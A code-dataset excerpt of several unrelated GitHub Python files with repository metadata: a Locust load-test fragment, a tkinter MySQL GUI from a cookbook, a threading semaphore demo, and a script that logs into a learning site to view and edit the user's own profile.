print(cursor)
available = []
for id in cursor:
print("VALUE %s" % str(id[0]) )
available.append(str(id[0]))
print(available)
print(len(available))
if len(available) != 0:
maxNumber = len(available)-1
if maxNumber == 0:
defensaId = available[maxNumber]
else:
defensaId = available[randrange(maxNumber)]
else:
defensaId = 0
print("No hay Defensas disponibles pendientes...")
cursor.close()
conn.close()
return defensaId
class UserTasks(TaskSet):
tasks = {
index:2,
verMisDefensas:2,
verDetalleDefensa:2,
GuardarSituacionJuridicaDefensa:2
}
def on_start(self):
login(self)
|
[
"evomatik@localhost.localdomain"
] |
evomatik@localhost.localdomain
|
d9f0bd32c021cff6d85d2b4c86f7c6a119a3be14
|
0912be54934d2ac5022c85151479a1460afcd570
|
/Ch07_Code/GUI_MySQL.py
|
cf54d12400d1045cffa7dcdeaa05f864343ff849
|
[
"MIT"
] |
permissive
|
actuarial-tools/Python-GUI-Programming-Cookbook-Third-Edition
|
6d9d155663dda4450d0b180f43bab46c24d18d09
|
8c9fc4b3bff8eeeda7f18381faf33c19e98a14fe
|
refs/heads/master
| 2023-01-31T13:11:34.315477
| 2020-12-15T08:21:06
| 2020-12-15T08:21:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,876
|
py
|
'''
Created on May 29, 2019
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import Menu
from tkinter import Spinbox
from Ch07_Code.ToolTip import ToolTip
from threading import Thread
from time import sleep
from queue import Queue
from tkinter import filedialog as fd
from os import path, makedirs
from tkinter import messagebox as mBox
from Ch07_Code.GUI_MySQL_class import MySQL
# Module level GLOBALS
GLOBAL_CONST = 42
fDir = path.dirname(__file__)
netDir = fDir + '\\Backup'
if not path.exists(netDir):
makedirs(netDir, exist_ok = True)
WIDGET_LABEL = ' Widgets Frame '
#===================================================================
class OOP():
def __init__(self):
# Create instance
self.win = tk.Tk()
# Add a title
self.win.title("Python GUI")
# Disable resizing the window
self.win.resizable(0,0)
# Create a Queue
self.guiQueue = Queue()
self.createWidgets()
# populate Tab 2 Entries
self.defaultFileEntries()
# create MySQL instance
self.mySQL = MySQL()
def defaultFileEntries(self):
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, 'Z:\\') # bogus path
self.fileEntry.config(state='readonly')
self.netwEntry.delete(0, tk.END)
self.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.combo.get()
self.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.spin.get()
self.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.chVarUn.get(): self.check3.configure(state='disabled')
else: self.check3.configure(state='normal')
if self.chVarEn.get(): self.check2.configure(state='disabled')
else: self.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.radVar.get()
if radSel == 0: self.mySQL2.configure(text=WIDGET_LABEL + 'in Blue')
elif radSel == 1: self.mySQL2.configure(text=WIDGET_LABEL + 'in Gold')
elif radSel == 2: self.mySQL2.configure(text=WIDGET_LABEL + 'in Red')
# Exit GUI cleanly
def _quit(self):
self.win.quit()
self.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
print('methodInAThread():', self.runT.isAlive())
# Running methods in Threads
def createThread(self, num):
self.runT = Thread(target=self.methodInAThread, args=[num])
self.runT.setDaemon(True)
self.runT.start()
print(self.runT)
print('createThread():', self.runT.isAlive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.guiQueue.get()
print(qItem)
self.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.bookTitle.get()
page = self.pageNumber.get()
quote = self.quote.get(1.0, tk.END)
print(title)
print(quote)
self.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.mySQL.showBooks()
print(allBooks)
self.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
#####################################################################################
def createWidgets(self):
# Tab Control introduced here --------------------------------------
tabControl = ttk.Notebook(self.win) # Create Tab Control
tab1 = ttk.Frame(tabControl) # Create a tab
tabControl.add(tab1, text='MySQL') # Add the tab
tab2 = ttk.Frame(tabControl) # Add a second tab
tabControl.add(tab2, text='Widgets') # Make second tab visible
tabControl.pack(expand=1, fill="both") # Pack to make visible
# ~ Tab Control introduced here -----------------------------------------
# We are creating a container frame to hold all other widgets
self.mySQL = ttk.LabelFrame(tab1, text=' Python Database ')
self.mySQL.grid(column=0, row=0, padx=8, pady=4)
# Creating a Label
ttk.Label(self.mySQL, text="Book Title:").grid(column=0, row=0, sticky='W')
# Adding a Textbox Entry widget
book = tk.StringVar()
self.bookTitle = ttk.Entry(self.mySQL, width=34, textvariable=book)
self.bookTitle.grid(column=0, row=1, sticky='W')
# Adding a Textbox Entry widget
book1 = tk.StringVar()
self.bookTitle1 = ttk.Entry(self.mySQL, width=34, textvariable=book1)
self.bookTitle1.grid(column=0, row=2, sticky='W')
# Adding a Textbox Entry widget
book2 = tk.StringVar()
self.bookTitle2 = ttk.Entry(self.mySQL, width=34, textvariable=book2)
self.bookTitle2.grid(column=0, row=3, sticky='W')
# Creating a Label
ttk.Label(self.mySQL, text="Page:").grid(column=1, row=0, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber.grid(column=1, row=1, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber1 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber1.grid(column=1, row=2, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber2 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber2.grid(column=1, row=3, sticky='W')
# Adding a Button
self.action = ttk.Button(self.mySQL, text="Insert Quote", command=self.insertQuote)
self.action.grid(column=2, row=1)
# Adding a Button
self.action1 = ttk.Button(self.mySQL, text="Get Quotes", command=self.getQuote)
self.action1.grid(column=2, row=2)
# Adding a Button
self.action2 = ttk.Button(self.mySQL, text="Mody Quote", command=self.modifyQuote)
self.action2.grid(column=2, row=3)
# Add some space around each widget
for child in self.mySQL.winfo_children():
child.grid_configure(padx=2, pady=4)
quoteFrame = ttk.LabelFrame(tab1, text=' Book Quotation ')
quoteFrame.grid(column=0, row=1, padx=8, pady=4)
# Using a scrolled Text control
quoteW = 40; quoteH = 6
self.quote = scrolledtext.ScrolledText(quoteFrame, width=quoteW, height=quoteH, wrap=tk.WORD)
self.quote.grid(column=0, row=8, sticky='WE', columnspan=3)
# Add some space around each widget
for child in quoteFrame.winfo_children():
child.grid_configure(padx=2, pady=4)
#======================================================================================================
# Tab Control 2
#======================================================================================================
# We are creating a container frame to hold all other widgets -- Tab2
self.mySQL2 = ttk.LabelFrame(tab2, text=WIDGET_LABEL)
self.mySQL2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
self.chVarDis = tk.IntVar()
self.check1 = tk.Checkbutton(self.mySQL2, text="Disabled", variable=self.chVarDis, state='disabled')
self.check1.select()
self.check1.grid(column=0, row=0, sticky=tk.W)
self.chVarUn = tk.IntVar()
self.check2 = tk.Checkbutton(self.mySQL2, text="UnChecked", variable=self.chVarUn)
self.check2.deselect()
self.check2.grid(column=1, row=0, sticky=tk.W )
self.chVarEn = tk.IntVar()
self.check3 = tk.Checkbutton(self.mySQL2, text="Toggle", variable=self.chVarEn)
self.check3.deselect()
self.check3.grid(column=2, row=0, sticky=tk.W)
# trace the state of the two checkbuttons
self.chVarUn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
self.chVarEn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
# Radiobutton list
colors = ["Blue", "Gold", "Red"]
self.radVar = tk.IntVar()
# Selecting a non-existing index value for radVar
self.radVar.set(99)
# Creating all three Radiobutton widgets within one loop
for col in range(3):
curRad = 'rad' + str(col)
curRad = tk.Radiobutton(self.mySQL2, text=colors[col], variable=self.radVar, value=col, command=self.radCall)
curRad.grid(column=col, row=6, sticky=tk.W, columnspan=3)
# And now adding tooltips
ToolTip(curRad, 'This is a Radiobutton control.')
# Create a container to hold labels
labelsFrame = ttk.LabelFrame(self.mySQL2, text=' Labels within a Frame ')
labelsFrame.grid(column=0, row=7, pady=6)
# Place labels into the container element - vertically
ttk.Label(labelsFrame, text="Choose a number:").grid(column=0, row=0)
ttk.Label(labelsFrame, text="Label 2").grid(column=0, row=1)
# Add some space around each label
for child in labelsFrame.winfo_children():
child.grid_configure(padx=6, pady=1)
number = tk.StringVar()
self.combo = ttk.Combobox(self.mySQL2, width=12, textvariable=number)
self.combo['values'] = (1, 2, 4, 42, 100)
self.combo.grid(column=1, row=7, sticky=tk.W)
self.combo.current(0)
self.combo.bind('<<ComboboxSelected>>', self._combo)
# Adding a Spinbox widget using a set of values
self.spin = Spinbox(self.mySQL2, values=(1, 2, 4, 42, 100), width=5, bd=8, command=self._spin)
self.spin.grid(column=2, row=7, sticky='W,', padx=6, pady=1)
# Using a scrolled Text control
scrolW = 40; scrolH = 1
self.scr = scrolledtext.ScrolledText(self.mySQL2, width=scrolW, height=scrolH, wrap=tk.WORD)
self.scr.grid(column=0, row=8, sticky='WE', columnspan=3)
# Create Manage Files Frame ------------------------------------------------
mngFilesFrame = ttk.LabelFrame(tab2, text=' Manage Files: ')
mngFilesFrame.grid(column=0, row=1, sticky='WE', padx=10, pady=5)
# Button Callback
def getFileName():
print('hello from getFileName')
fDir = path.dirname(__file__)
fName = fd.askopenfilename(parent=self.win, initialdir=fDir)
print(fName)
self.fileEntry.config(state='enabled')
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fName)
if len(fName) > self.entryLen:
self.fileEntry.config(width=len(fName) + 3)
# Add Widgets to Manage Files Frame
lb = ttk.Button(mngFilesFrame, text="Browse to File...", command=getFileName)
lb.grid(column=0, row=0, sticky=tk.W)
#-----------------------------------------------------
file = tk.StringVar()
self.entryLen = scrolW - 4
self.fileEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=file)
self.fileEntry.grid(column=1, row=0, sticky=tk.W)
#-----------------------------------------------------
logDir = tk.StringVar()
self.netwEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=logDir)
self.netwEntry.grid(column=1, row=1, sticky=tk.W)
def copyFile():
import shutil
src = self.fileEntry.get()
file = src.split('/')[-1]
dst = self.netwEntry.get() + '\\'+ file
try:
shutil.copy(src, dst)
mBox.showinfo('Copy File to Network', 'Succes: File copied.')
except FileNotFoundError as err:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(err))
except Exception as ex:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(ex))
cb = ttk.Button(mngFilesFrame, text="Copy File To : ", command=copyFile)
cb.grid(column=0, row=1, sticky=tk.E)
# Add some space around each label
for child in mngFilesFrame.winfo_children():
child.grid_configure(padx=6, pady=6)
# Creating a Menu Bar ==========================================================
menuBar = Menu(tab1)
self.win.config(menu=menuBar)
# Add menu items
fileMenu = Menu(menuBar, tearoff=0)
fileMenu.add_command(label="New")
fileMenu.add_separator()
fileMenu.add_command(label="Exit", command=self._quit)
menuBar.add_cascade(label="File", menu=fileMenu)
# Add another Menu to the Menu Bar and an item
helpMenu = Menu(menuBar, tearoff=0)
helpMenu.add_command(label="About")
menuBar.add_cascade(label="Help", menu=helpMenu)
# Change the main windows icon
self.win.iconbitmap('pyc.ico')
# Using tkinter Variable Classes
strData = tk.StringVar()
strData.set('Hello StringVar')
# It is not necessary to create a tk.StringVar()
strData = tk.StringVar()
strData = self.spin.get()
# Place cursor into name Entry
self.bookTitle.focus()
# Add a Tooltip to the Spinbox
ToolTip(self.spin, 'This is a Spin control.')
# Add Tooltips to more widgets
ToolTip(self.bookTitle, 'This is an Entry control.')
ToolTip(self.action, 'This is a Button control.')
ToolTip(self.scr, 'This is a ScrolledText control.')
#======================
# Start GUI
#======================
oop = OOP()
oop.win.mainloop()
|
[
"noreply@github.com"
] |
actuarial-tools.noreply@github.com
|
839113b7423bd08946db266c62e3e63a9519e089
|
cbc5e5e32cdb04a16b3d2306f7d8dc265a86c47b
|
/py9/Test_Semaphore.py
|
0d640709f22e835dd46ded3338e1a7783df24eac
|
[] |
no_license
|
github-ygy/python_leisure
|
9821bd9feb6b5f05e98fd09ed1be1be56f3f8e35
|
f58ee2668771b1e334ef0a0b3e3fc7f6aacb8ccf
|
refs/heads/master
| 2021-01-23T06:15:27.715836
| 2017-10-31T16:56:44
| 2017-10-31T16:56:44
| 102,496,812
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
#!/usr/bin/env python
# author:ygy
import threading, time
def run(n):
semaphore.acquire() #信号量计数
print("run the thread: %s" % n)
time.sleep(1)
print("off the thread:%s" % n)
semaphore.release() #释放数量
# if __name__ == '__main__':
semaphore = threading.BoundedSemaphore(5) # 最多允许5个线程同时运行
for i in range(22):
t = threading.Thread(target=run, args=(i,))
t.start()
|
[
"ygyworkforit@163.com"
] |
ygyworkforit@163.com
|
8b7cdf915356ccea4db3aa8f64482b9db8fd2025
|
0b95518353f172a0d3f53c3afb0608ab975974d2
|
/login/001-kgc/001-kgc.py
|
cb7dc0a736c884bdb998ef386df548563724bc16
|
[] |
no_license
|
uba888/uba_python
|
54b19e6483f5daacec6d2e0e5a4d9cf02ca2d7b5
|
1b63378ab86cda8221c6f7f9bad68c364874ccb6
|
refs/heads/master
| 2020-01-23T22:00:05.122331
| 2016-12-30T10:31:15
| 2016-12-30T10:31:15
| 74,717,680
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,812
|
py
|
#!/usr/bin/python3
import requests
import hashlib
from scrapy import Selector
import http.cookiejar as cookielib
# 构造 Request headers
headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'}
session=requests.session()
session.cookies = cookielib.LWPCookieJar(filename='cookies')
try:
session.cookies.load(ignore_discard=True)
except:
print("Cookie 未能加载")
# 模拟登陆
def login(username,password):
password=hashlib.md5(password.encode('utf-8')).hexdigest()
kgc_url='http://www.kgc.cn/member/login?redirect_url=http%3A%2F%2Fwww.kgc.cn%2F'
kgc_data={'UserLoginForm[redirect_url]': 'http://www.kgc.cn/', 'UserLoginForm[password]':password, 'UserLoginForm[username]':username}
session.get(kgc_url)
response=session.post(kgc_url,data=kgc_data,headers=headers)
xp=Selector(text=response.text)
username=xp.xpath('//span[@class="top-nick"]/text()').extract()
try:
username[0]
print("欢迎%s登陆成功" % (username[0]))
except:
print("登陆失败")
session.cookies.save()
# 修改个人信息
def personal_set():
config_headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'}
config_url='http://www.kgc.cn/my/member/modifyProfile'
realname=input('请输入您要修改的姓名:')
sign=input('请输入您要设置的个性签名:')
config_data={'sign': sign, 'realname':realname}
r3=session.post(config_url,data=config_data,headers=config_headers)
try:
print(r3.json())
print("修改成功")
except:
print("未修改成功,请检查")
#查询个人信息
def select():
config_headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'}
response=session.get('http://www.kgc.cn/my/member/profile.shtml#self-zl',headers=config_headers)
hxs=Selector(text=response.text)
old_realname=hxs.xpath('//div[@class="self-zl self-common hide"]/form/div[1]/input/@value').extract()
old_sign=hxs.xpath('//div[@class="self-zl self-common hide"]/form/div[7]/input/@value').extract()
print("现在的姓名为:%s,现在的个性签名为:%s" % (old_realname,old_sign))
if __name__=="__main__":
while True:
print('''=================请选择相应菜单进行操作=================
1) 进行登陆
2) 修改个人信息
3) 查询个人信息
4) 退出菜单''')
choice=input("请选择你要进行的操作:")
if choice == "1":
username=input('请输入用户名:')
password=input('请输入密码:')
login(username,password)
elif choice == "2":
personal_set()
elif choice == "3":
select()
elif choice == "4":
print("谢谢使用!")
break
else:
print("输入错误,请重试")
|
[
"lsqtyihui@163.com"
] |
lsqtyihui@163.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.